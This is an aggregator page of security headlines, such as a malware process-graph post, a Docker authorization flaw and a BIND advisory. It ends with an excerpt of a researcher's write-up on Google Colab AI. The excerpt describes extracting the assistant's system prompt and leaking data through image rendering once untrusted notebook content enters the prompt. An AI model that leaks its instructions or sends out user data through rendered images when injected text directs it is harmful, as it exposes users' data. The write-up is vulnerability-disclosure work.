Aggregator
See Malicious Process Relationships on a Visual Graph
At ANY.RUN, we’re all about making in-depth technical information accessible. One of the ways we do this is by providing you with various detailed, yet easy-to-understand reports on malware behavior. One such report is Process graph. What is Process graph? Process graph is a report that visually shows how system processes, especially malicious ones, relate […]
The post See Malicious Process Relationships <br> on a Visual Graph appeared first on ANY.RUN's Cybersecurity Blog.
2024美国拥有多少核武器?
在审讯过程中快速分裂一个人的 12 种方法
演讲议题巡展 | Windows远程文件协议漏洞挖掘之旅
Patchwork黑客组织瞄准我国科技大学,窃取核心数据!
减少 95% 资源的向量搜索 | 使用云搜索的 DiskANN
⼤模型在⽹络安全⽅⾯的应⽤汇总
Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins
CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software
New Chrome Feature Scans Password-Protected Files for Malicious Content
Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.
Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.
This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:
- Google did not reward this finding, and
- Colab now automatically puts Notebook content (untrusted data) into the prompt.
Let’s explore the specifics.
Google Colab AI - Revealing the System PromptAt the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM to not render images.